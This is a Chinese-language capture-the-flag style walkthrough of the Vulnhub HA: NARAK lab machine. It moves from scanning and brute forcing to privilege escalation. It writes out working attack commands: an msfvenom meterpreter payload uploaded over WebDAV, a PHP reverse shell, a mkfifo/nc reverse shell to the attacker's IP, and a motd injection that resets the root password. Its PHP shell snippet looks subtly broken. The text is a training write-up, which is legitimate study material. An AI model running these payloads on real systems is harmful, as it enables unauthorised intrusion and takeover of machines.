Vulnhub靶场之HA: NARAK
字数 845 2025-08-15 21:32:31

HA: NARAK 靶机渗透测试教学文档

靶机概述

HA: NARAK 是 Vulnhub 上的一个渗透测试靶机,包含多种漏洞和提权路径,适合练习信息收集、漏洞利用和权限提升技能。

信息收集阶段

1. 网络扫描

使用 nmap 进行目标发现和端口扫描:

nmap -sn 192.168.1.0/24  # 确定目标IP
nmap -sV -A -T4 <target_ip>  # 详细扫描
nmap -sU -T4 <target_ip>  # UDP扫描补充

2. 目录枚举

使用 dirb 扫描网站目录:

dirb http://<target_ip> /usr/share/wordlists/dirb/common.txt

3. 网站分析

  • 访问网站首页,检查功能点
  • 使用 cewl 生成自定义字典:
cewl http://<target_ip> -w wordlist.txt
  • 使用 hydra 进行爆破:
hydra -L users.txt -P wordlist.txt <target_ip> http-post-form "/path:user=^USER^&pass=^PASS^:Invalid"

漏洞利用

方法一:WebDAV 漏洞利用

  1. 使用 cadaver 连接 WebDAV:
cadaver http://<target_ip>/webdav
  1. 生成反弹 shell 木马:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > shell.php
  1. 上传木马:
dav> put shell.php
  1. 在攻击机启动监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run
  1. 访问木马文件触发反弹 shell

方法二:TFTP 服务利用

  1. 使用 7kbscan 扫描敏感文件:
python 7kbscan-WebPathBrute/7kbscan.py -u http://<target_ip> -t txt
  1. 发现 tips.txt 提示 creds.txt 在 TFTP 中
  2. 使用 TFTP 获取文件:
tftp <target_ip>
get creds.txt
  1. 解码 base64 凭证:
echo "base64字符串" | base64 -d

方法三:PHP 反弹 shell

  1. 准备 PHP 反弹 shell 脚本:
<?php
$sock=fsockopen("<your_ip>",<port>);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
  1. 上传到可写目录
  2. 使用 nc 监听:
nc -lvnp <port>
  1. 访问 PHP 文件触发反弹

权限提升

方法一:SSH 欢迎消息提权

  1. 使用 linpeas.sh 进行本地枚举:
# 攻击机搭建HTTP服务
python3 -m http.server 80

# 目标机下载
cd /tmp
wget http://<your_ip>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
  1. 发现 /etc/update-motd.d/00-header 可写
  2. 修改文件添加提权命令:
echo 'echo "root:123" | chpasswd' >> /etc/update-motd.d/00-header
  1. 重新 SSH 登录使修改生效

方法二:Brainfuck 解码

  1. 在系统中发现奇怪文件,内容为 Brainfuck 编码
  2. 使用在线解码器解码得到字符串 "chitragupt"
  3. 查看系统用户:
cat /etc/passwd | grep -v nologin
  1. 使用解码得到的密码尝试 SSH 登录

方法三:有名管道提权

  1. 创建有名管道反弹 shell:
mkfifo /tmp/f; nc <your_ip> <port> 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
  1. 攻击机监听:
nc -lvnp <port>
  1. 重新 SSH 登录触发反弹

总结

该靶机展示了多种渗透测试技术:

  1. WebDAV 未授权访问上传
  2. TFTP 服务信息泄露
  3. 弱凭证爆破
  4. 多种提权方法(motd、SSH 凭证、可写脚本等)
  5. 编码信息隐藏(Brainfuck、base64)

建议按照文档步骤逐步练习,掌握每种技术的原理和实际应用场景。

HA: NARAK 靶机渗透测试教学文档 靶机概述 HA: NARAK 是 Vulnhub 上的一个渗透测试靶机,包含多种漏洞和提权路径,适合练习信息收集、漏洞利用和权限提升技能。 信息收集阶段 1. 网络扫描 使用 nmap 进行目标发现和端口扫描: 2. 目录枚举 使用 dirb 扫描网站目录: 3. 网站分析 访问网站首页,检查功能点 使用 cewl 生成自定义字典: 使用 hydra 进行爆破: 漏洞利用 方法一:WebDAV 漏洞利用 使用 cadaver 连接 WebDAV: 生成反弹 shell 木马: 上传木马: 在攻击机启动监听: 访问木马文件触发反弹 shell 方法二:TFTP 服务利用 使用 7kbscan 扫描敏感文件: 发现 tips.txt 提示 creds.txt 在 TFTP 中 使用 TFTP 获取文件: 解码 base64 凭证: 方法三:PHP 反弹 shell 准备 PHP 反弹 shell 脚本: 上传到可写目录 使用 nc 监听: 访问 PHP 文件触发反弹 权限提升 方法一:SSH 欢迎消息提权 使用 linpeas.sh 进行本地枚举: 发现 /etc/update-motd.d/00-header 可写 修改文件添加提权命令: 重新 SSH 登录使修改生效 方法二:Brainfuck 解码 在系统中发现奇怪文件,内容为 Brainfuck 编码 使用在线解码器解码得到字符串 "chitragupt" 查看系统用户: 使用解码得到的密码尝试 SSH 登录 方法三:有名管道提权 创建有名管道反弹 shell: 攻击机监听: 重新 SSH 登录触发反弹 总结 该靶机展示了多种渗透测试技术: WebDAV 未授权访问上传 TFTP 服务信息泄露 弱凭证爆破 多种提权方法(motd、SSH 凭证、可写脚本等) 编码信息隐藏(Brainfuck、base64) 建议按照文档步骤逐步练习,掌握每种技术的原理和实际应用场景。